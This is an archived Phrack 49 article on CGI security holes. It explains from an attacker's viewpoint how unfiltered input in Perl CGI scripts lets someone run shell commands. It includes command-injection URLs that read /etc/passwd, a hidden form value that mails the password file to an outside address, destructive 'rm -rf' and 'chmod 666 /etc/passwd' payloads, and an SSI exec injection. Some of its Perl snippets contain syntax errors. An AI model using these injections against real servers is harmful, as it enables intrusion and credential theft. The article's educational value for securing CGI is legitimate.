TUCoPS :: Phrack Magazine Issue #49 :: p49-08.txt

Introduction to CGI and CGI vulnerabilities

                                .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                   File 08 of 16

				CGI Security Holes
--------------------------------------------------------------------------
				by Gregory Gilliss


	This article will discuss the Common Gateway Interface, its 
relationship to the World Wide Web and the Internet, and will endeavor to 
point out vulnerabilities in system security exposed by its use.  The UNIX 
operating system will be the platform central to this discussion.  
Programming techniques will be illustrated by examples using PERL.  

1.	Introduction

	The Common Gateway Interface (CGI) is an interface specification that
allows communication between client programs and information servers which 
understand the Hyper-Text Transfer Protocol (HTTP).  TCP/IP is the 
communications protocol used by the CGI script and the server during the 
communications.  The default port for communications is port 80 (privileged),
but other non-privileged ports may be specified.

	CGI scripts can perform relatively simple processing on the client 
side.  A CGI script can be used to format Hyper-Text Markup Language (HTML) 
documents, dynamically create HTML documents, and dynamically generate 
graphical images.  CGI can also perform transaction recording using standard 
input and standard output.  CGI stores information in system environment 
variables that can be accessed through the CGI scripts.  CGI scripts can also
accept command line arguments.  CGI scripts operate in two basic modes:  

	- In the first mode, the CGI script performs rudimentary data 
processing on the input passed to it.  An example of data processing is the 
popular web lint page that checks the syntax of HTML documents.  

	- The second mode is where the CGI script acts as a conduit for data 
being passed from the client program to the server, and back from the 
server to the client.  For example, a CGI script can be used as a front end 
to a database program running on the server.  

	CGI scripts can be written using compiled programming languages, 
interpreted programming languages, and scripting languages.  The only real 
advantage that exists for one type of development tool over the other is that
compiled programs tend to execute more quickly than interpreted programs.  
Interpreted languages such as AppleScript, TCL, PERL and UNIX shell scripts 
afford the possibility of acquiring and modifying the source (discussed 
later), and are generally faster to develop than compiled programs.  

	The set of common methods available to CGI programs is defined in 
the HTTP 1.0 specification.  The three methods pertinent to this discussion 
are the `Get` method, the `Post` method, and the `Put` method.  The `Get` 
method retrieves information from the server to the client.  The `Post` 
method asks the server to accept information passed from the client as input 
to the specified target. The `Put` method asks the server to accept 
information passed from the client as a replacement for the specified target.

2.	Vulnerabilities

	The vulnerabilities caused by the use of CGI scripts are not 
weaknesses in CGI itself, but are weaknesses inherent in the HTTP 
specification and in various system programs.  CGI simply allows access to 
those vulnerabilities.  There are other ways to exploit the system security.
For example, insecure file permissions can be exploited using FTP or telnet.
CGI simply provides more opportunities to exploit these and other security 
flaws.

	The CGI specification provides opportunities to read files, acquire 
shell access, and corrupt file systems on server machines and their attached 
hosts.  Means of gaining access include: exploiting assumptions of the 
script, exploiting weaknesses in the server environment, and exploiting 
weaknesses in other programs and system calls.  The primary weakness in 
CGI scripts is insufficient input validation.

	According to the HTTP 1.0 specification, data passed to a CGI script 
must be encoded so that it can work on any hardware or software platform.  
Data passed by a CGI script using the Get method is appended to the end of a 
Universal Resource Locator (URL).  This data can be accessed by the CGI 
script as an environment variable named QUERY_STRING.  Data is passed as 
tokens of the form variable=value, with the tokens separated by ampersands 
(&).  Actual ampersands, and other non-alphanumeric characters, must be 
escaped, meaning that they are encoded as two-digit hexadecimal values.  
Escaped characters are preceded by a percent sign (%) in the encoded URL.  It
is the responsibility of the CGI script to escape or remove characters in 
user supplied input data.  Characters such as '<' and '>', the delimiters for
HTML tags, are usually removed using a simple search and replace operation, 
such as the following:

----------------8<----------------------------------------------------------

# Process input values
{$NAME, $VALUE) = split(/=/, $_);	# split up each variable=value pair
$VALUE =~ s/\+/ /g;			# Replace '+' with ' '
$VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg;  # Replace %xx characters with ASCII
# Escape metacharacters
$VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters
$MYDATA[$NAME} = $VALUE;	# Assign the value to the associative array

----------------8<----------------------------------------------------------

	This example removes special characters such as the semi-colon 
character, which is interpreted by the shell as a command separator.  
Inclusion of a semi-colon in the input data allows for the possibility 
of appending an additional command to the input.  Take note of the forward 
slash characters that precede the characters being substituted.  In PERL, a 
backslash is required to tell the interpreter not to process the following 
character.*

	The above example is incomplete since it does not address the 
possibility of the new line character '%0a', which can be used to execute 
commands other than those provided by the script.  Therefore it is possible to 
append a string to a URL to perform functions outside of the script.  For 
example, the following URL requests a copy of /etc/passwd from the server 
machine:

http://www.odci.gov/cgi-bin/query?%0a/bin/cat%20/etc/passwd

The strings '%0a" and '%20' are ASCII line feed and blank respectively.

	The front end interface to a CGI program is an HTML document called a 
form.  Forms include the HTML tag <INPUT>.  Each <INPUT> tag has a variable 
name associated with it.  This is the variable name that forms the left hand 
side of the previously mentioned variable=value token.  The contents of the 
variable forms the value portion of the token.  Actual CGI scripts may 
perform input filtering on the contents of the <INPUT> field.  However if the
CGI script does not filter special characters, then a situation analogous to 
the above example exists.  Interpreted CGI scripts that fail to validate the 
<INPUT> data will pass the data directly to the interpreter. **

	Another HTML tag sometime seen in forms is the <SELECT> tag.  
<SELECT> tags allow the user on the client side to select from a finite set 
of choices.  The selection becomes the right hand side of the variable=value 
token passed to the CGI script.  CGI script often fail to validate the 
input from a <SELECT> field, assuming that the field will contain only 
pre-defined data.  Again, this data is passed directly to the interpreter for
interpreted languages.  Compiled programs which do not perform input 
validation and/or escape special characters may also be vulnerable.

	A shell script or PERL script that invokes the UNIX mail program may 
be vulnerable to a shell escape.  Mail accepts commands of the form 
'~!command' and forks a shell to execute the command.  If the CGI 
script does not filter out the '~!' sequence, the system is vulnerable.  
Sendmail holes can likewise be exploited in this manner.  Again, the key is 
to find a script that does not properly filter input characters.

	If you can find a CGI script that contains a UNIX system() call with 
only one argument, then you have found a doorway into the system.  When the 
system() function is invoked with only one argument, the system forks a 
separate shell to handle the request.  When this happens, it is possible to 
append data to the input and generate unexpected results.  For example, a 
PERL script containing the following:

system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file");

is designed to mail a copy of $input_file to the mail address specified in 
the $mailto_address variable.  By calling system() with one argument, the 
program causes a separate shell to be forked.  By copying and modifying the 
input to the form:

<INPUT TYPE="HIDDEN" NAME="mailto_address" 
VALUE="address@server.com;mail cracker@hacker.com </etc/passwd">

we can exploit this weakness and obtain the password file from the server. ***

	The system() function is not the only command that will fork a new 
shell.  the exec() function with a single argument also provides the same 
exposure.  Opening a file and piping the result also forks a separate shell.  
In PERL, the function:

open(FILE, "| program_name $ARGS");

will open FILE and pipe the contents to program_name, which will run as a 
separate shell.

	In PERL, the eval command parses and executes whatever argument is 
passed to it.  CGI scripts that pass arbitrary user input to the eval command
can be used to execute anything the user desires.  For example, 

$_ = $VALUE;
s/"/\\"/g		# Escape double quotes
$RESULT = eval qq/"$_"/;	# evaluate the correctly quoted input

would pass the data from $VALUE to eval essentially unchanged, except for 
ensuring that the double quote don't confuse the interpreter (how nice of 
them).  If $VALUE contains "rm -rf *", the results will be disastrous.  File 
permissions should be examined carefully.  CGI scripts that are world 
readable can be copied, modified, and replaced.  In addition, PERL scripts 
that include lines such as the following:

require "cgi-lib";

are including a library file named cgi-lib.  If this file's permissions are 
insecure, the script is vulnerable.  To check file permissions, the string 
'%0a/bin/ls%20-la%20/usr/src/include" could be appended to the URL of a CGI 
script using the Get method.

	Copying, modifying, and replacing the library file will allow users 
to execute command or routines inside the library file.  Also, if the PERL 
interpreter, which usually resides in /usr/bin, runs as SETUID root, it is 
possible to modify file permissions by passing a command directly to the 
system through the interpreter.  The eval command example above would permit 
the execution of :

$_ = "chmod 666 \/etc\/passwd"
$RESULT = eval qq/"$_"/;

which would make the password file world writable.

	There is a feature supported under some HTTPD servers called Server 
Side Includes (SSI).  This is a mechanism that allows the server to modify 
the outgoing document before sending it to the client browser.  SSI is a 
*huge* security hole, and most everyone except the most inexperienced 
sysadmin has it disabled.  However, in the event that you discover a site 
that enables SSI,, the syntax of commands is:

<!--#command variable="value" -->

Both command and 'tag' must be lowercase.  If the script source does not 
correctly filter input,input such as:

<!--#exec cmd="chmod 666 /etc/passwd"--> 

	All SSI commands start with a pound sign (#) followed by a keyword.  
"exec cmd" launches a shell that executes a command enclosed in the double 
quotes.  If this option is turned on, you have enormous flexibility with what
you can do on the target machine.

3.	Conclusion

	The improper use of CGI scripts affords users a number of 
vulnerabilities in system security.  Failure to validate user input, poorly 
chosen function calls, and insufficient file permissions can all be exploited
through the misuse of CGI.



*   Adapted from Mudry, R. J., Serving The Web, Coriolis Group Books, p. 192
**  Jennifer Myers, Usenet posting
*** Adapted from Phillips, P., Safe CGI Programming, 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH